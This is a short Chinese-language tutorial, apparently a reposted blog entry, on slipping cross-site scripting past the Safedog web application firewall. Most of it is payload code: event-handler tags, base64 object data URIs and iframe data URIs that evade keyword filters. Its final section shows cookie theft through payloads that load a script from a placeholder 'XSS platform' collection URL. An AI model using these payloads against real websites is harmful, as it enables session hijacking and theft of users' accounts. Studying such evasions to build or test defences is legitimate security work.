xss过waf(以安全狗为例)

xss过waf(以安全狗为例)

0x01. Bypass原理:
**原理:**我们知道安全狗会检测一些常见的XSS测试关键词,比如script、alert等。我们可以找到一些效果跟script、alert一样的,且未被安全狗拦截的语句去执行JS语句

  1. 测试script标签被拦截:
    xss过waf(以安全狗为例)_第1张图片

0x02. Bypass安全狗:
1)测试标签,弹窗测试,成功弹窗

<img src=x onerror=alert(/img/)> 

xss过waf(以安全狗为例)_第2张图片
2)测试prompt(用于显示可提示用户进行输入的对话框,可在alert被禁用的情况下代替)

<img src=x onerror=prompt(/img/)>

xss过waf(以安全狗为例)_第3张图片3)测试video标签

<video src=x onerror=alert(/video/)>

xss过waf(以安全狗为例)_第4张图片

4)测试audio标签

<audio src=x onerror=alert(/audio/)>

xss过waf(以安全狗为例)_第5张图片
5)测试button标签点击事件

<button onclick=alert(1)>xss</button>

xss过waf(以安全狗为例)_第6张图片
6)测试object标签搭配base64加密

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgvb2JqZWN0Lyk8L3NjcmlwdD4="></object>
base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg    
      解码:<script>alert(1)</script>

xss过waf(以安全狗为例)_第7张图片
7)测试iframe标签

&lt 表示左半括号 < 
&gt 表示右半括号 >
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

xss过waf(以安全狗为例)_第8张图片
0x03. 测试拿cookie
1)利用img标签执行js:

document.createElement('script'):创建元素动态插入script 
appendChild:方法向节点添加最后一个子节点
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="xss平台url">

xss过waf(以安全狗为例)_第9张图片
1.2) 查看获取的数据:
xss过waf(以安全狗为例)_第10张图片
2)利用object 标签执行js:

<object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cHM6Ly94c3PlubPlj7B1cmw+PC9zY3JpcHQ+"></object>
解密:<script src=https://xss平台url></script>

xss过waf(以安全狗为例)_第11张图片
2.2) 查看获取的数据:
xss过waf(以安全狗为例)_第12张图片

你可能感兴趣的:(渗透测试,bypass,安全,xss,javascript)